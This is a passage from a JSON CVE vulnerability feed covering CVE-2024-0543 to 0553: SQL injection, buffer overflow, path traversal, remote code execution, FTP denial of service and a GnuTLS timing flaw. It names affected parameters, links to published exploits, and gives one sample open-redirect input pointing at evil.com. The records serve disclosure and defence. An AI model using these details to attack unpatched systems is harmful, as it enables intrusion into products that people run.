Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250712", "name" : "https://vuldb.com/?id.250712", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been rated as critical. Affected by this issue is the function formWifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250712. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:w9_firmware:1.0.0.7\\(4456\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:w9:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T05:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0543", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/drive/folders/1U2nirIi6OtuCi-vrD2-VHyJbsHK5yA7t?usp=sharing", "name" : "https://drive.google.com/drive/folders/1U2nirIi6OtuCi-vrD2-VHyJbsHK5yA7t?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/drive/folders/1U2nirIi6OtuCi-vrD2-VHyJbsHK5yA7t?usp=sharing", "name" : "https://drive.google.com/drive/folders/1U2nirIi6OtuCi-vrD2-VHyJbsHK5yA7t?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250713", "name" : "https://vuldb.com/?ctiid.250713", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250713", "name" : "https://vuldb.com/?ctiid.250713", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250713", "name" : "https://vuldb.com/?id.250713", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250713", "name" : "https://vuldb.com/?id.250713", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in CodeAstro Real Estate Management System up to 1.0. This affects an unknown part of the file propertydetail.php. The manipulation of the argument pid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250713 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codeastro:real_estate_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-15T06:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0545", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.250714", "name" : "https://vuldb.com/?ctiid.250714", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250714", "name" : "VDB-250714 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250714", "name" : "https://vuldb.com/?id.250714", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250714", "name" : "VDB-250714 | CodeCanyon RISE Ultimate Project Manager signin redirect", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.266974", "name" : "Submit #266974 | Codecanyon Web Application 3.5.3 Open Redirect", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in CodeCanyon RISE Ultimate Project Manager 3.5.3. This vulnerability affects unknown code of the file /index.php/signin. The manipulation of the argument redirect with the input http://evil.com leads to open redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fairsketch:rise_ultimate_project_manager:3.5.3:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-15T06:15Z", "lastModifiedDate" : "2025-04-21T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0546", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/94905/EasyFTP-1.7.0.x-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/94905/EasyFTP-1.7.0.x-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/94905/EasyFTP-1.7.0.x-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/94905/EasyFTP-1.7.0.x-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250715", "name" : "https://vuldb.com/?ctiid.250715", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250715", "name" : "https://vuldb.com/?ctiid.250715", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250715", "name" : "https://vuldb.com/?id.250715", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250715", "name" : "https://vuldb.com/?id.250715", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, has been found in EasyFTP 1.7.0. This issue affects some unknown processing of the component LIST Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250715." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:easyftp:easyftp:1.7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-15T06:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0547", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-404" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/163079/Ability-FTP-Server-2.34-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/163079/Ability-FTP-Server-2.34-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/163079/Ability-FTP-Server-2.34-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/163079/Ability-FTP-Server-2.34-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250717", "name" : "https://vuldb.com/?ctiid.250717", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250717", "name" : "https://vuldb.com/?ctiid.250717", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250717", "name" : "https://vuldb.com/?id.250717", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250717", "name" : "https://vuldb.com/?id.250717", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Ability FTP Server 2.34 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component APPE Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250717 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codecrafters:ability_ftp_server:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.34", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-15T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0548", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/163038/FreeFloat-FTP-Server-1.0-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/163038/FreeFloat-FTP-Server-1.0-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/163038/FreeFloat-FTP-Server-1.0-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/163038/FreeFloat-FTP-Server-1.0-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250718", "name" : "https://vuldb.com/?ctiid.250718", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250718", "name" : "https://vuldb.com/?ctiid.250718", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250718", "name" : "https://vuldb.com/?id.250718", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250718", "name" : "https://vuldb.com/?id.250718", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in FreeFloat FTP Server 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component SIZE Command Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250718 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:freefloat_ftp_server_project:freefloat_ftp_server:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-15T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0549", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/026849df0224b6a8754f4103530bc015874def62", "name" : "https://github.com/mintplex-labs/anything-llm/commit/026849df0224b6a8754f4103530bc015874def62", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/026849df0224b6a8754f4103530bc015874def62", "name" : "https://github.com/mintplex-labs/anything-llm/commit/026849df0224b6a8754f4103530bc015874def62", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/fcb4001e-0290-4b78-a2f0-91ee5d20cc72", "name" : "https://huntr.com/bounties/fcb4001e-0290-4b78-a2f0-91ee5d20cc72", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/fcb4001e-0290-4b78-a2f0-91ee5d20cc72", "name" : "https://huntr.com/bounties/fcb4001e-0290-4b78-a2f0-91ee5d20cc72", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "mintplex-labs/anything-llm is vulnerable to a relative path traversal attack, allowing unauthorized attackers with a default role account to delete files and folders within the filesystem, including critical database files such as 'anythingllm.db'. The vulnerability stems from insufficient input validation and normalization in the handling of file and folder deletion requests. Successful exploitation results in the compromise of data integrity and availability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-16T00:15Z", "lastModifiedDate" : "2025-07-09T19:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0550", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/e1dcd5ded010b03abd6aa32d1bf0668a48e38e17", "name" : "https://github.com/mintplex-labs/anything-llm/commit/e1dcd5ded010b03abd6aa32d1bf0668a48e38e17", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/e1dcd5ded010b03abd6aa32d1bf0668a48e38e17", "name" : "https://github.com/mintplex-labs/anything-llm/commit/e1dcd5ded010b03abd6aa32d1bf0668a48e38e17", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/c6afeb5e-f211-4b3d-aa4b-6bad734217a6", "name" : "https://huntr.com/bounties/c6afeb5e-f211-4b3d-aa4b-6bad734217a6", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/c6afeb5e-f211-4b3d-aa4b-6bad734217a6", "name" : "https://huntr.com/bounties/c6afeb5e-f211-4b3d-aa4b-6bad734217a6", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A user who is privileged already `manager` or `admin` can set their profile picture via the frontend API using a relative filepath to then user the PFP GET API to download any valid files.\n\nThe attacker would have to have been granted privileged permissions to the system before executing this attack." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-28T05:15Z", "lastModifiedDate" : "2025-01-10T15:22Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0551", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/7aaa4b38e7112a6cd879c1238310c56b1844c6d8", "name" : "https://github.com/mintplex-labs/anything-llm/commit/7aaa4b38e7112a6cd879c1238310c56b1844c6d8", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/7aaa4b38e7112a6cd879c1238310c56b1844c6d8", "name" : "https://github.com/mintplex-labs/anything-llm/commit/7aaa4b38e7112a6cd879c1238310c56b1844c6d8", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/f114c787-ab5f-4f83-afa5-c000435efb78", "name" : "https://huntr.com/bounties/f114c787-ab5f-4f83-afa5-c000435efb78", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://huntr.com/bounties/f114c787-ab5f-4f83-afa5-c000435efb78", "name" : "https://huntr.com/bounties/f114c787-ab5f-4f83-afa5-c000435efb78", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Enable exports of the database and associated exported information of the system via the default user role. The attacked would have to have been granted access to the system prior to the attack.\n\nIt is worth noting that the deterministic nature of the export name is lower risk as the UI for exporting would start the download at the same time, which once downloaded - deletes the export from the system.\n\nThe endpoint for exporting should simply be patched to a higher privilege level." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 7.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 4.2 } }, "publishedDate" : "2024-02-27T14:15Z", "lastModifiedDate" : "2025-03-04T12:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0552", "ASSIGNER" : "cve@cert.org.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-74" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.twcert.org.tw/tw/cp-132-7662-41d50-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-7662-41d50-1.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.twcert.org.tw/tw/cp-132-7662-41d50-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-7662-41d50-1.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Intumit inc. SmartRobot's web framwork has a remote code execution vulnerability. An unauthorized remote attacker can exploit this vulnerability to execute arbitrary commands on the remote server." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:intumit:smartrobot_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "6.0.0-202012tw", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:intumit:smartrobot:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T04:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0553", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-203" } ] } ] }, "references" : { "reference_data" : [ { "url" : "http://www.openwall.com/lists/oss-security/2024/01/19/3", "name" : "http://www.openwall.com/lists/oss-security/2024/01/19/3", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0533", "name" : "RHSA-2024:0533", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0533", "name" : "RHSA-2024:0533", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0627", "name" : "RHSA-2024:0627", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0627", "name" : "RHSA-2024:0627", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0796", "name" : "RHSA-2024:0796", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0796", "name" : "RHSA-2024:0796", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1082", "name" : "RHSA-2024:1082", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1082", "name" : "RHSA-2024:1082", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1108", "name" : "RHSA-2024:1108", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1108", "name" : "RHSA-2024:1108", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1383", "name" : "RHSA-2024:1383", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1383", "name" : "RHSA-2024:1383", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2094", "name" : "RHSA-2024:2094", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2094", "name" : "RHSA-2024:2094", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0553", "name" : "https://access.redhat.com/security/cve/CVE-2024-0553", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0553", "name" : "https://access.redhat.com/security/cve/CVE-2024-0553", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258412", "name" : "RHBZ#2258412", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258412", "name" : "RHBZ#2258412", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://gitlab.com/gnutls/gnutls/-/issues/1522", "name" : "https://gitlab.com/gnutls/gnutls/-/issues/1522", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://gitlab.com/gnutls/gnutls/-/issues/1522", "name" : "https://gitlab.com/gnutls/gnutls/-/issues/1522", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/02/msg00010.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/02/msg00010.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html", "name" : "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html", "name" : "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240202-0011/", "name" : "https://security.netapp.com/advisory/ntap-20240202-0011/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from the response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981." } ] } }, "configurations" : { "CVE_data_version" : 